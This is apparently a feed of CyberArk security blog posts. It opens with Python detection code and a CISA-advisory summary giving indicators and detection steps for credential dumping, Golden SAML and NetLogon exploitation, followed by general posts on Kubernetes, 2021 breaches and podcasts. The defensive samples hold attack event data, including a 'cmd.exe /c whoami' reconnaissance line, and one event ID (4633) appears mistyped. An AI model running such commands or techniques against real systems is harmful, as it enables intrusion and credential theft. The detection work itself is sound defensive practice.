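     "NewProcessName": CMD, "ParentProcessName": "C:\\Program Files\\Office\\OUTLOOK.EXE",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 4769, "TimeCreated": "2022-01-18T09:20:00", "TargetUserName": "mallory@CORP",
     "ServiceName": "MSSQLSvc/db01", "TicketEncryptionType": "0x17"},
] + [
    {"EventID": 4625, "TimeCreated": f"2022-01-18T09:10:{5 * i:02d}", "TargetUserName": "svc-backup"}
    for i in range(12)
] + [
    {"EventID": 4625, "TimeCreated": t, "TargetUserName": "bob"}
    for t in ("2022-01-18T09:12:00", "2022-01-18T09:13:00")
] + [
    {"EventID": 4769, "TimeCreated": f"2022-01-18T09:20:{i + 1:02d}", "TargetUserName": "mallory@CORP",
     "ServiceName": f"HTTP/web{i:02d}", "TicketEncryptionType": "0x12"}
    for i in range(11)
]
```

Run against SAMPLE_EVENTS, the three functions flag the Outlook-spawned cmd.exe, the 12-failure spray against svc-backup (14 failures organisation-wide) and the single user pulling one RC4 ticket plus 12 distinct services inside a minute.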


OS Credential Dumping. The APT actors were observed exfiltrating credentials and exporting copies of the Active Directory database ntds.dit.

IOCs
  • Access to the ntds.dit file. Depending on your environment and how backups are enabled, you may have false positives here. The goal is to monitor access to the ntds.dit for any attempt at abnormal access, outside of normal hours or from an abnormal user or machine, for example.
Detection Steps
  • Windows Event ID 4663 can be used to observe access to the ntds.dit file. To narrow the results, filter on Read (or similar) access, since a read is all that is required to copy the file.
  • VSSAdmin.exe executions for shadow copies can also be observed using this event ID, to spot abnormal backup runs.

Credential Access

From there, the attackers looked for vulnerabilities to exploit, along with private key certificate files on compromised systems for insecurely stored credentials.

Obtain Private Keys. The attackers also obtained private encryption keys from the Active Directory Federation Services (ADFS) container to decrypt corresponding SAML signing certificates and perform a Golden SAML attack, which gave them access to anything that trusts SAML tokens within the environment.

IOCs
  • Unusual file access to the encryption keys.
  • Authentications within the service provider that don’t exist within the identity provider. (Golden SAML event IDs 1200 and 1202 from the ADFS server can be used to identify this information.)
Detection Steps
  • Windows Event ID 4633 can be used to validate access to private key files. You can monitor READ type access to certain files ending with .ppk, for example, or any standard your company may use.
  • Monitor authentications in the service provider that did not generate Event IDs 1200 and 1202 on the ADFS server.


Exploitation. The attackers also reportedly leveraged an exploit called “NetLogon” (CVE-2020-1472). This exploit essentially allows an attacker to impersonate any account on the network and change the password of the domain controller machine account, for example, to gain full access to the domain.

IOCs
  • IOCs can include anonymous logon events, a machine account having its password changed (as it shouldn’t happen often) and NetLogon attempts to the same system at the same time.
Detection Steps
  • Windows Event ID 4742 can be used to observe a machine account password change and Event ID 5805 can be used to observe NetLogon attempts. Observing a 4742 password change attempt at the same time as multiple 5805 events get generated for the same machine will validate a possible exploit attempt.
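The 4742/5805 correlation in the detection step above, as an added example that is not CyberArk’s own code: the events are constructed, and the computer name of each 5805 record is assumed to have already been extracted from the event’s message text into a ComputerName field.

```python
"""Cross-event correlation for the NetLogon (CVE-2020-1472) IOCs described above:
a 4742 machine-account password change that lands inside a burst of 5805 NetLogon
events for the same computer. Added example, not CyberArk's code; the events are
constructed, and each 5805 carries an assumed, pre-extracted 'ComputerName' field."""
from collections import defaultdict
from datetime import datetime, timedelta


def netlogon_abuse_candidates(events, min_netlogon=3, window=timedelta(minutes=2)):
    """Return 4742 changes with >= min_netlogon 5805 events for that machine within `window`."""
    netlogon = defaultdict(list)
    for e in events:
        if e["EventID"] == 5805:
            netlogon[e["ComputerName"].upper()].append(datetime.fromisoformat(e["TimeCreated"]))
    hits = []
    for e in events:
        if e["EventID"] != 4742:
            continue
        machine = e["TargetUserName"].rstrip("$").upper()  # 4742 names the account as DC01$
        changed = datetime.fromisoformat(e["TimeCreated"])
        nearby = [t for t in netlogon.get(machine, []) if abs(t - changed) <= window]
        if len(nearby) >= min_netlogon:
            hits.append({"machine": machine, "changed_at": e["TimeCreated"],
                         "changed_by": e["SubjectUserName"], "netlogon_events": len(nearby)})
    return hits


# Constructed sample: DC01's password changed by an anonymous logon amid four NetLogon
# events; WS42 rotating its own machine password normally, with no NetLogon burst nearby.
NETLOGON_SAMPLE = [
    {"EventID": 5805, "TimeCreated": f"2022-01-18T10:00:{s:02d}", "ComputerName": "DC01"}
    for s in (0, 10, 20, 25)
] + [
    {"EventID": 4742, "TimeCreated": "2022-01-18T10:00:30", "TargetUserName": "DC01$",
     "SubjectUserName": "ANONYMOUS LOGON"},
    {"EventID": 4742, "TimeCreated": "2022-01-18T11:30:00", "TargetUserName": "WS42$",
     "SubjectUserName": "WS42$"},
    {"EventID": 5805, "TimeCreated": "2022-01-18T11:45:00", "ComputerName": "WS42"},
]
```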

Best Practices for Risk Mitigation

Protecting organizations against increasingly sophisticated cyber attacks calls for an improved security posture centered on securing identities and safeguarding privileged access.

In most attacks — regardless of who is behind them — the identity layer is the first entry point into an organization’s environment. Advisory authors note that attackers have “demonstrated the ability to maintain persistent, undetected, long-term access in compromised environments — including cloud environments — by using legitimate credentials.”

In addition to best practices such as implementing multi-factor authentication (MFA); adopting endpoint detection and response (EDR) and anti-virus (AV) solutions; regularly installing patches and requiring strong password practices, these additional cybersecurity steps should be followed as part of a defense in depth approach:

  • Use application controls. Don’t allow execution of arbitrary executables, as many legitimate executables can be used to execute arbitrary commands. The CISA advisory points to nation state attackers who have used cmd.exe and PowerShell to execute commands and tasks on remote machines.
  • Limit accounts and Shadow Admins. Enforce least privilege access consistently throughout your organization by disabling unnecessary accounts. Limiting privilege is essential, as attackers will target high-value assets and access them by stealing credentials and escalating privileges. Threat detection capabilities can help speed detection and block credential theft attempts. For example, zBang, an open source tool, can be used to detect Shadow Admins: stealthy user identities that have sensitive permissions granting them the ability to escalate privileges in cloud environments. These entities, which often arise from misconfigurations or lack of awareness, can be targeted by attackers, putting the entire environment at risk.
  • Secure backups. Take steps to ensure domain controller backups are properly secured, as attackers may try to access or create a copy of the Active Directory domain database to steal credential information or other data about devices, users and access rights. Consider tools with threat detection capabilities to protect the NTDS file that stores sensitive Active Directory data.
  • Use AES Kerberos encryption. Ensure AES Kerberos encryption is used instead of RC4, to help prevent adversaries from abusing a valid Kerberos ticket-granting ticket (TGT) or sniffing network traffic to obtain a ticket-granting service (TGS) ticket that may be vulnerable to brute force. The zBang tool’s RiskySPN module can be used to help detect targets for Kerberoasting.
  • Protect credential certificates. Protect stored certificates to block attempts to access token-signing certificates and mitigate threats such as the Golden SAML attack.

The following CyberArk Identity Security offerings can help organizations protect against cyber threats and comply with the latest CISA advisory guidance:

3 Kubernetes Risks and What to Do About Them https://www.cyberark.com/blog/3-kubernetes-risks-and-what-to-do-about-them/ Tue, 11 Jan 2022 17:00:50 +0000 https://www.cyberark.com/?p=126407

Today, speed trumps nearly everything when it comes to software development. And as digital business requirements evolve, developers are being asked to work even faster and with more agility than ever before. Take Netflix, for example: to meet society’s need for new, binge-worthy watches, the company delivers hundreds of microservices and thousands of deployments each day.

Containers are often used by developers to meet this need for speed by packaging software together with its dependencies. And according to a 2021 Red Hat study, 88% of the teams surveyed rely on Kubernetes to manage their containerized workloads and services, automate processes and move faster and at scale.

Kubernetes and the Not-so-Secret Security Challenge

Despite its popularity, and perhaps partly because of it, the Kubernetes orchestration platform introduces new identity-centric security challenges that must be tackled early in the development cycle. Otherwise, small issues can grow quickly, resulting in costly delays and defects.

The same Red Hat study referenced above found that almost all developers (94%) experienced at least one Kubernetes-related security incident in the last 12 months, while more than half have delayed deploying applications into production due to security concerns.

In dynamic cloud-native environments, secrets — such as passwords, SSH Keys, certificates and API tokens — are used widely to grant access to anyone (such as an application developer) or anything (such as an application) that knows them. Organizations become vulnerable when these secrets are leaked to logs, exposed in application code or mishandled in other ways. Exacerbating the issue, secrets have the unique ability to grant access to additional secrets and privileges, which is known as the “secret zero problem.”

Three Key Kubernetes Risks and Mitigation Steps

Securing secrets in containerized environments requires the collaboration of both development and security teams. Here are three potentially vulnerable areas within Kubernetes to focus on as part of a true DevSecOps approach:

Kubernetes Risk #1: Hardware

Whether it runs on-premises or in a cloud managed by a third party, Kubernetes still requires a hardware platform. If an attacker can breach the virtual machine running Kubernetes and gain access to root privileges, the attacker can go on to breach the Kubernetes cluster.

Security best practices:

  • Enforcing the principle of least privilege can go a long way in protecting the hardware that underpins both Kubernetes and the containers themselves. Provision virtual machines with the fewest privileges necessary to perform their function, to make it difficult for attackers to gain root access.
  • Rotate credentials often and also consider vaulting to further strengthen protections.

Kubernetes Risk #2: The Kubernetes API Server

Beyond the physical machines, the Kubernetes control plane must also be secured. This control plane has access to all the containers running in a cluster, including the Kubernetes API server, which acts as the front end of the control plane and facilitates user interaction within the cluster.

An attack on the API server can have big implications. Even a few stolen secrets or credentials can be used to escalate an attacker’s access and privilege, and what was first a small crack in the armor can quickly turn into a network-wide issue.

Security best practices:

  • To minimize risk, start with blocking credential theft and malware threats on the endpoint — where many attacks begin — paying close attention to local machines used by users with administrative privileges in Kubernetes.
  • Use multi-factor authentication (MFA) to authenticate access to the Kubernetes API server. That way, even if a credential is stolen, it can’t be authenticated or used to access Kubernetes. Development teams can also set the experimental-encryption-provider-config flag on the Kubernetes API server to bolster secrets protection.
  • Once a user is authenticated in Kubernetes, they can access all the resources within the cluster, so managing permissions is critical. Role-based access control (RBAC) will help ensure users only have the access rights they need and aren’t overly permissioned.
  • Similarly, least privilege should be enforced across Kubernetes service accounts, which are automatically created when a cluster is set up to help authenticate Pods. Secrets should also be rotated on a regular basis to keep access out of the hands of those who don’t need it.

Kubernetes Risk #3: Containers

Pods and the containers within them are the building blocks of a Kubernetes cluster and contain the information needed to run the application. There are several key areas of vulnerability within this container ecosystem and workflow, as illustrated below. To explore them in depth, read our eBook “Securing Containers in a Kubernetes Environment.”

Security best practices: Consider these container security best practices, along with those outlined above:

  • While it may seem convenient, do not build secrets into the code or the container image. Otherwise, anyone with access to the source code will also have access to those secrets, and they will surface in code repositories, logs and elsewhere.
  • Avoid using environment variables for sensitive information. This will help prevent attackers from discovering clear text secrets with simple commands if they compromise access to the container API.
  • Implement RBAC, limit secret access to the processes running inside a given container, and delete secrets/revoke access to resources when they are no longer needed to minimize exposure.
  • Log usage, including when a secret is injected, rotated or removed from a container and regularly audit access to critical systems. Also, consider centralizing secrets management to make audit, access control and secrets management more manageable.

Arm your development teams with these best practices to help strengthen security across your organization’s entire Kubernetes environment. And look for ways to incorporate self-service capabilities into developers’ everyday processes (like code scanning, for example) to make life easier for everyone — and keep things moving quickly.

When security and development teams partner to help defend against attacks, drive operational efficiencies, and satisfy audit and compliance requirements, everyone wins.

3 Cyber Attacks that Didn’t Get Enough Attention in 2021 (But Probably Should Have) https://www.cyberark.com/blog/3-cyber-attacks-that-didnt-get-enough-attention-in-2021-but-probably-should-have/ Fri, 07 Jan 2022 14:00:27 +0000 https://www.cyberark.com/?p=126217

In 1988, graduate student Robert Tappan Morris created a computer worm and inadvertently launched what many consider to be the world’s first cyber attack. Since that infamous “Morris Worm,” major events from Stuxnet to WannaCry have filled the pages of history, inspired TV shows and best-selling books, and reshaped the cybersecurity landscape.

But for every notorious attack, there are countless others that don’t make headlines, are overshadowed by competing news or simply get brushed aside. In 2021, SolarWinds and a series of high-profile ransomware attacks dominated the media and conversations, yet there were other significant incidents that had the potential for far-reaching privacy, regulatory and even human safety implications — and warrant another look. There could be lessons still waiting to be learned.

Florida Water Facility Attack Highlights Pervasive ICS Vulnerabilities

In February 2021, a threat actor attempted to poison a Florida city’s water supply in what seemed like an attack straight out of a Hollywood movie. A plant operator first noticed something amiss when his cursor began moving across his computer screen to open programs used to control water treatments.

The attacker reportedly increased the level of sodium hydroxide in the water 100 times. Thanks to the operator’s quick discovery and immediate actions to stabilize the levels, no one was harmed. But the real-world “could haves” loomed large, and the incident highlighted how dire critical infrastructure cybersecurity challenges remain.

The public utilities sector is uniquely vulnerable for many reasons. For one, much of the infrastructure controlling industrial control systems (ICS) — the systems that support essential services — dates to the 1980s or 1990s. The critical nature of utility operations required the developers of these systems to focus on system availability and interoperability but not necessarily on security. Over the years, as these systems became increasingly joined to internet-connected IT, they became more attractive targets for attackers.

Both government and the private sector have ramped up spending on cybersecurity operations and maintenance, yet despite these efforts, many utility companies struggle to keep up with increasingly sophisticated and highly targeted attacks. And the stakes are high: beyond bad publicity, brand damage or costly regulatory fines, public safety is potentially at risk, as evidenced by this incident.

Following the attack, former director of the U.S. Cybersecurity and Infrastructure Security Agency (CISA) Christopher Krebs wrote, “Unfortunately, that water treatment facility is the rule rather than the exception. When an organization is struggling to make payroll and to keep systems on a generation of technology created in the last decade, even the basics in cybersecurity often are out of reach.”

The Verkada Breach Shows the Dark Side of the IoT

Comprising billions of connected devices (and counting), the Internet of Things (IoT) represents a potentially massive attack surface and continues to pose a formidable cybersecurity challenge for enterprises.

When IoT devices are not secured like other sensitive network assets, risk can escalate quickly, as seen in March 2021 when attackers breached Verkada, a cloud-based video security company.

Using legitimate admin account credentials found on the internet, the attackers were able to navigate through live feeds of some 150,000 cameras stationed in factories, hospitals, classrooms, prisons and more, while also accessing sensitive footage belonging to Verkada software customers. It was later confirmed that more than 100 people within the organization had “super admin” access, each of whom could access thousands of customer cameras — demonstrating the potential dangers of overprivileged users.

Fortunately, damages from the incident were reportedly limited, but things could have been much worse. The breach was just the tip of the iceberg, giving a glimpse of how dangerous the IoT can be. For those paying attention, it prompted new questions and fueled ongoing privacy debates around how surveillance technology should be used, how sensitive data — such as bedside footage of a hospital patient or proprietary manufacturing processes in action — should be stored and how access to this data should be managed.

While the incident didn’t garner lengthy news cycles, it shouldn’t be forgotten. The question of “who watches the watchmen” will likely reemerge as daily life becomes increasingly connected.

The Twitch Data Leak Reinforces the Need for Least Privilege Access

Popular video game site Twitch was targeted in October 2021 with what the New York Times called a “potentially disastrous” data breach.

The threat actors reportedly stole the platform’s entire source code, along with 125GB of sensitive data including top user payout information, and then leaked it online in an effort to “foster more disruption and competition in the online video streaming space,” according to Video Games Chronicle.

According to a company statement, the incident was caused by a “server configuration change that allowed improper access by an unauthorized third party.” Particularly in cloud-based environments, such misconfigurations — including unchanged default credentials or those granting excessive permissions — are very common, are often used as attackers’ entry point of choice and can potentially open a path to sensitive assets such as source code and other intellectual property. The dynamic nature of the cloud makes traditional change control approaches for proper configuration extremely difficult.

While the company later said that user credentials and bank details were not accessed or exposed in the Twitch breach, privacy-conscious users didn’t wait to find out. The Guardian reported that global online queries for “how to delete Twitch” surged by 733% on the day the news broke, noting the platform’s popularity could potentially take a hit as a result of the breach.

The attack illustrated the many challenges companies face in securing cloud environments and emphasized the importance of least privilege access in reducing risk and defending against internal and external threats.

Those 2021 cyber attacks quickly lost the spotlight; however, there are valuable considerations and lessons to be learned from them as we begin a new year. Because, as Edmund Burke once said, “In history, a great volume is unrolled for our instruction, drawing the materials of future wisdom from the past errors and infirmities of mankind.”

Has SolarWinds Transformed Cybersecurity? https://www.cyberark.com/blog/has-solarwinds-transformed-cybersecurity/ Wed, 05 Jan 2022 17:00:32 +0000 https://www.cyberark.com/?p=126098

A year ago, the business world entered 2021 still reeling from the catastrophic SolarWinds attack that impacted thousands of organizations and put software supply chain risks on everyone’s radar — from government officials to enterprise CEOs to small business owners.

To say it was a watershed moment would be an understatement. Considered one of the most damaging data breaches in history, SolarWinds’ long-term impact continues to be tallied. The attack highlighted inherent weaknesses in software supply chains — many exacerbated by the global pandemic — and showed us just how far attacker innovation has come. It kicked off a series of events that would define 2021 and became the lens through which all subsequent cybersecurity incidents are viewed. Yet as we enter 2022 — the “post-SolarWinds era” — has anything actually changed in terms of how organizations protect themselves? We recently polled a small group of enterprise security professionals to find out. *

What (If Anything) Has Changed Since the SolarWinds Attack?

According to our research, the cybersecurity community has mixed feelings about where things stand a year later. The impulse is to say that organizations have collectively emerged stronger and more prepared for what’s ahead, but that may not actually be the case.

What’s clear from our findings is that organizations are very aware of supply chain risks: 86% of organizations either “strongly agree” or “somewhat agree” that the supply chain continues to be a vulnerability, while 88% either “strongly” or “somewhat” agree that we’ll likely see an increase in sophisticated attacks like SolarWinds.

“I think that the SolarWinds attack was eye-opening, emphasizing critical risks associated with the software supply chain. I believe supply chain risks were treated with somewhat lower priority until this attack, and now are elevated in importance. Greater awareness and understanding of these risks definitely make us work harder to be secure.”

– Privileged Account Management Professional, Global Financial Institution

There’s broad consensus on the need to embrace a Zero Trust model — and overall mindset — to reduce risk: 62% either “strongly agree” or “somewhat agree” that their organization is moving toward Zero Trust since the SolarWinds attack. Meanwhile, 98% agree that implementing strong Identity Security policies and controls that restrict privileged access to Tier 0 systems will help them make this shift to Zero Trust by reducing exposure and enabling earlier detection.

“I believe that the SolarWinds case has shown that Zero Trust policies should apply not only to internal/external users but also to third-party suppliers. The threat has been described before, but there was no such case that impacted so many companies before.”

– Anonymous Respondent

In some cases, this heightened awareness of supply chain vulnerabilities has translated to action: 20% “strongly agree” that their organization has closely examined their supply chain for vulnerabilities and attack points and has taken action to mitigate risks.

“We started defining risk criteria for different types of suppliers’ services such as supplier and customer dependencies, critical software dependencies and single points of failure.”

– Anonymous Respondent

But unfortunately, in many organizations, things haven’t changed much at all:

  • 42% “strongly disagree,” “somewhat disagree” or “do not know” if their organization has defined risk criteria for the critical software dependencies in their organization’s software supply chain.
  • When asked if their organization validates third-party code and software before using them, 35% either “strongly disagree” or “somewhat disagree.”
  • 32% of respondents either “strongly agree” or “somewhat agree” that their organization underestimates the effect an attack like SolarWinds can have.
  • As a result, approximately one-quarter (26%) do not believe that, or do not know if, their organization is more equipped to defend against similar attacks since SolarWinds.

“A year later and still the same challenges.”

– Information Security Engineer, Large Financial Institution

Where to Go from Here?

Strong supply chain security must be more than a resolution this year — it must become a reality. A starting point is simply acknowledging the fact that any identity – human or machine – within your organization could be a target. With this “assume breach” mindset, you can focus and prioritize your efforts on stopping threats from compromising identities and breaking the privileged attack chain to protect your organization’s most valuable assets.

The time for action is now because, as one senior systems engineer at a large healthcare organization put it, “This story is far from over.”

*CyberArk data is based on an informal survey conducted with a set of security professionals based in the United States and Europe, sample size <100. Free-form survey responses have been edited for length and clarity.

Top Identity Security Blog Posts of 2021 https://www.cyberark.com/blog/top-identity-security-blog-posts-of-2021/ Fri, 31 Dec 2021 15:33:58 +0000 https://www.cyberark.com/?p=126076

2021 marked year two of our pandemic-driven, decentralized reality. While digital transformation initiatives moved full-steam ahead and employees continued to work from anywhere on devices of every kind using cloud-based services to stay connected and productive, identity has proven to be the ultimate attack vector.

Over the past 12 months, we’ve explored identity’s central role in everything from major breaches and emerging attack techniques to public policy discussions and new C-level job titles. As we close out 2021, here’s a look back on some of our most popular Identity Security blog posts.

Cyber Attacks Get Highly Targeted

Instead of casting a wide net, many attackers targeted very specific organizations for very specific reasons this year. Illustrating this trend, Lavi Lazarovitz, head of CyberArk Labs, deconstructed the anatomy of the targeted SolarWinds attack that leveraged a digital supply chain vector to infect thousands of organizations around the world.

While it’s important to understand the differences between opportunistic and targeted attacks, the initial attack vector remains the same, no matter the adversary’s strategy. By compromising an identity at the endpoint — whether it’s a desktop, laptop or server — attackers can gain entry to an organization and potentially open a privileged pathway that leads to its most valuable assets.

The Supply Chain Attack Saga Continues

SolarWinds was far from the first supply chain attack, but it served as a wake-up call for many organizations. On the flipside, attackers saw opportunity and homed in on upstream providers to exploit weaknesses and expand their reach.

In one post, CyberArk principal security researcher Nimrod Stoler dug into the Codecov breach — a highly evasive supply chain infiltration in which malicious actors targeted a popular software platform, infected the CI/CD pipeline, added a credentials harvester and then used it to steal thousands of MSP customers’ credentials. In another piece, Lavi Lazarovitz explored the massive Kaseya ransomware supply chain attack, which exploited trusted software (and the access and permissions it granted) to infect the IT management software provider’s global customer base and their downstream customers. And as CyberArk Global Sales Engineer Len Noe showed us, industry tools like the MITRE ATT&CK framework can help organizations better understand supply chain attacks and defend against future attempts that utilize similar tactics and techniques.

Attackers Live off the Land and Hide in Plain Sight

Adversaries looked for ways to use victim organizations’ own technology resources against them to “live off the land” (LotL) and remain hidden for long periods of time. Bryan Murphy, leader of our remediation services team, shared some patterns and red flags to watch out for. He also explained how a multi-layered endpoint security approach combining least privilege defense, strong authentication for identities, credential theft protection, application control and ransomware blocking can make it significantly harder for attackers to gain entry in the first place. But if they succeed (and you must assume they will), having layered controls in place will make it difficult for attackers to remain hidden for long.

Interest in Passwordless Authentication Grows

Nearly all the major breaches witnessed this year — as in years past — shared something in common: the compromise of identities and abuse of privileged credentials played a critical role. These attacks often began with credential theft via phishing and other common methods. This is one of several reasons why many enterprises are re-thinking passwords and traditional credentials altogether and exploring passwordless authentication to help protect identities linked to human users, secure critical corporate assets and even boost their bottom lines.

Cybersecurity Becomes “The” Board Room Topic

There isn’t an executive team on the planet that wasn’t talking about cybersecurity this year. It became a board-level issue (if it wasn’t one already), thanks to a seemingly endless string of high-profile attacks and skyrocketing cybersecurity insurance costs. It even drove the creation of new roles such as the Business Information Security Officer (BISO) who could bridge both sides of the business.

Security and IT teams were asked to defend and demonstrate their risk mitigation efforts under increased scrutiny. Yet articulating security priorities, such as moving toward a Zero Trust model, to non-technical audiences can be challenging. This post can help guide Board and C-level discussions on why Identity Security matters and how to get started — without getting lost in the weeds.

What’s Next

As we enter 2022, we can expect even more of the same along with continued attacker innovation. For instance, the recently disclosed Log4j vulnerability shows us how attackers may increasingly use popular open-source software to automate and magnify their supply chain attacks.

Though more cyber attacks are inevitable, loss is not. By placing identity at the heart of your security strategy, your organization can ring in the New Year with confidence, knowing your most critical assets are secure.


12 Cybersecurity Conversations Spanning Identity, Privilege and the Evolving Landscape https://www.cyberark.com/blog/12-cybersecurity-conversations-spanning-identity-privilege-and-the-evolving-landscape/ Tue, 28 Dec 2021 13:30:27 +0000 https://www.cyberark.com/?p=126064

When this year comes to a close (which is just about a blink away now), cyber crime damages will have cost the world $6 trillion, and ransomware attacks rose 148% during the rush to adapt to a largely remote/distributed workforce for the first time in history. Never has it been more incumbent upon the cybersecurity industry to do more than just try and stay a step ahead.

This year, CyberArk partnered with Cybercrime Magazine on a series of podcasts called “CyberTalk with CyberArk,” with the goal of thinking beyond the next step or the next attack to create systems and philosophies that work in our current reality. Taken as a whole, these conversations provide more than just a glimpse into the minds of the people working to define cybersecurity, apart from just patches and passwords. They reveal an industry that is constantly evolving and innovating, changing how we approach concepts like “identity” and “access” — and working tirelessly to embed security into every phase of project and product development.

With the last of the episodes having just rolled out, here’s a look back at 12 conversations from 2021. Hear how members of the CyberArk organization, from Founder and CEO Udi Mokady to Chief Customer Officer Shahar Layani — along with executives from outside the company — view the evolving cybersecurity landscape and what the future may hold.

EPISODE 1: “Why and How Organizations Need to Implement Identity Security, With CyberArk CEO Udi Mokady”

At the top of his conversation, Mokady touches upon a key theme that will carry throughout the series: “Identity is the new perimeter. It is the new battleground.” COVID eradicated the old perimeters, and the idea that identity is solely human quickly became a thing of the past as well. Machine identity is growing, and it’s becoming more and more important to acknowledge that as apps and devices spread out and become integral to our personal and professional lives.

In this grounding episode, Mokady discusses how the notion of Zero Trust was nascent in the earliest days of CyberArk and how cybersecurity has evolved from building walls to developing and sharing best practices, so organizations and individuals can protect what matters most. “Every organization under the sun can be a target because almost every company in some way, shape or form is a software company,” he says. “It’s applicable to all levels and industries.”

EPISODE 2: “Identity Access Management and Ransomware, with Andy Thompson, CyberArk Technical Evangelist”

Understanding the new battleground is the first step, and Technical Evangelist Andy Thompson picks up that ball and runs with it in this episode. Here, the focus is on thinking like an attacker, not just to prevent breaches (which is becoming less and less possible) but also to mitigate their damage by limiting what an attacker can access and where they can go.

Thompson walks us through recent major ransomware attacks and spotlights the primary lesson that connects them all: compromised identity used to gain access to privileged credentials. He shares how he and his CyberArk Labs team pore over millions of past ransomware attacks and how doing so helps them fortify and evolve the team’s proven mitigation techniques.

EPISODE 3: “Cyber Espionage Puts Supply Chains and Infrastructure at Risk, with Lavi Lazarovitz, CyberArk Senior Director of Cyber Research”

Senior Director of Cyber Research Lavi Lazarovitz echoes Mokady’s “every organization under the sun can be a target” comments in Episode One by digging into recent high-profile breaches. Lazarovitz breaks down how attackers use whatever’s needed to get to the code, database and data they’re after — and expresses concern that automatic updates are particularly difficult to monitor and control, and that emerging technology can be just as hard to monitor.

In the end, Lazarovitz suggests that companies can protect themselves by creating visibility. They need to see exactly what’s coming inbound, the level of privileges, what versions of programs are running, what kind of code is being pulled from libraries — as well as the many tools for cloud and container environments.

EPISODE 4: “Why Higher Education Needs a Cybersecurity Program, with CyberArk Senior Director – Public Sector Matt Kenslea”

CyberArk’s Senior Director – Public Sector Matt Kenslea shifts the focus of the series slightly in his podcast conversation by turning to the world of higher education. One of the most surprising takeaways from his episode is the fact that the FBI rates higher education institutions as being at a greater risk of ransomware attack than even financial institutions. Universities are built to be open, to foster sharing and collaboration. Bad actors know how to exploit that.

Kenslea goes on to offer some solutions for privilege and protection for these institutions, and they must include Zero Trust architecture that limits privilege. Schools must see everyone as a potential threat. They need to secure high-value targets with session isolation, lock down common platforms and make sure to give the least privilege for endpoint protection.

EPISODE 5: “What MFA Means for Your Organization, with Shay Nahari, VP of Red Team Services at CyberArk”

One of the key themes emerging from the podcast series has been how individuals and organizations need to find ways to enhance security without slowing their ability to operate or live their daily lives. Enter Shay Nahari with a detailed discussion on Multi-Factor Authentication (MFA).

Nahari digs into the increasing supply chain woes that have been exacerbated by the pandemic, and he explains how companies need to realize they cannot control everything in their supply chains, so they must assume they will get breached.

MFA can help mitigate the risk and alert organizations to malicious activity, but it’s not about prevention; instead, it’s about limitation, he says. Successfully integrated MFA is all about a balance between security and operation.

EPISODE 6: “The Cybersecurity Customer Experience, with CyberArk Chief Customer Officer Shahar Layani”

Security controls are only as good as their adoption, which is stressed by CyberArk CCO Shahar Layani in this installment. He explains the CyberArk Blueprint alluded to by Udi Mokady, which helps organizations and individuals understand their own journeys and how security measures can be implemented and maintained effectively along each step.

In one of the conversation’s most insightful moments, Layani explains how security is a team game, and it’s important for customers to understand that concept from the start.

EPISODE 7: “Cybersecurity Insurance: What It Entails and Why It’s Important, with CyberAcuView CEO Mark Camillo”

Despite the dramatic shift in our technological landscape and its immediate impact on our working and personal lives, cybersecurity still isn’t a top-of-mind topic for many people. So, it stands to reason that cyber insurance is even less of a priority. And in this episode, CyberAcuView CEO Mark Camillo is here to talk us through it and why it’s been such a hot industry topic in 2021.

Camillo discusses how the concept of cybersecurity insurance has evolved over the years and how insurers review the cybersecurity measures taken by companies to help prevent attacks as part of their initial assessments. MFA, for example, can help reduce the cost of insurance. Camillo also talks about his belief that we’ll see more partnerships between tech and insurance companies going forward.

EPISODE 8: “Home Networks and Enterprise Security, with Bryan Murphy, Director of Consulting Services and Leader of CyberArk’s Remediation Services”

With decentralized workforces (and IT departments), the new normal must include educating individuals on how to protect their homes and personal devices, as if they are extensions of their offices. Because, says Bryan Murphy, Director of Consulting Services and Leader of CyberArk’s Remediation Services, they are.

Murphy explains how he teaches and trains employees to recognize security threats when working remotely — like being able to spot phishing emails and to be more careful when entering credentials.

He explains his “Back to Basics” as an important approach for security: Don’t assume spam filters will catch all threats; be careful when using outdated equipment, outdated routers and firmware; and use guest networks for friends and family to mitigate some threats while at home. And reset passwords. All of these are simple but effective ways to mitigate attack threats.

EPISODE 9: “Security Issues with Serverless Functions, with CyberArk’s Tal Kandel”

Cloud technology has been adopted by a larger majority than ever before, due to the new ubiquity of working from home. It makes sense, right? Employees need to access their work infrastructure away from the office. But with the convenience and flexibility of the cloud comes, of course, added vulnerabilities and new forms of attack.

Innovation Business Senior Director at CyberArk Tal Kandel explores these challenges in this episode in a discussion that covers the particular challenges of using serverless functions in the cloud and how to manage them to provide security for a remote workforce. Each entity, Kandel explains — whether human or machine — should only be granted least privilege, because any unnecessary entitlement can potentially be abused by a malicious actor.

EPISODE 10: “Creating a Cybersecurity Culture, with Highmark Health CISO Omar Khawaja”

Cybersecurity isn’t a piece of software; it’s a lifestyle. Arguable hyperbole aside, Highmark Health CISO Omar Khawaja spends this episode detailing the need for what he refers to as the “human element” in all cybersecurity protocols.

Khawaja explains that, even now, 84% of security issues still involve human beings. Training is hard because people don’t always pay attention to the details of everything they encounter — they’re rushed or maybe not all that cyber-savvy to begin with — and the ultimate goal is to change behavior. Most security programs excel at the things they can do themselves, he says, but the vulnerabilities lie in the human risk factor. As Khawaja goes on to explain, organizational change management principles and tools are the secret sauce to how you can change how humans behave.

EPISODE 11: “The Future of PAM and Identity Security, with CyberArk Senior VP Barak Feldman”

Calling back to the first episode with Udi Mokady, CyberArk Senior Vice President Barak Feldman ponders the shifting landscape of Identity Security in his CyberTalk conversation and discusses how innovation in the security space must be as swift and creative as those seeking to undermine those efforts.

The focus of his discussion, of course, centers around Privileged Access Management (PAM). And Feldman sounds similar refrains to those of Mokady and others in the podcast series: Companies need to assume breach, use a Zero Trust model and utilize MFA and privilege controls. New guidelines from the U.S. and other governments throughout the world in the public sector are creating new and useful guidelines, he says, but CyberArk must always think about the user experience while also considering emerging tech and protection.

EPISODE 12: “Why DevSecOps is Key to Cybersecurity Initiatives, with CyberArk DevSecOps GM Kurt Sand”

Who better than CyberArk’s resident DevSecOps evangelist Kurt Sand to, well, evangelize about the need for DevSecOps in robust and dynamic cybersecurity initiatives? Sand explains the importance of integrating security earlier in the production timeline of any program or application and making thinking about security almost second nature — not just for those tasked with overseeing it but with everyone along the production pipeline.

Sand discusses the “Shift Left” idea as a security approach to development — the principle of testing early for bugs and defects is being applied to security because it’s expensive to remediate. Exploring vulnerabilities early on in development will save money and time in the long run. Organizations, Sand says, need to realize DevSecOps is a never-ending process — they need to understand they are building an ongoing program. And it must be made a regular part of their ongoing processes as soon as possible. Sand puts it bluntly: “Procrastination isn’t in your favor — get started.”

You can listen to all of the series’ episodes HERE, or you can find them wherever you stream or download your favorite podcasts.

]]>
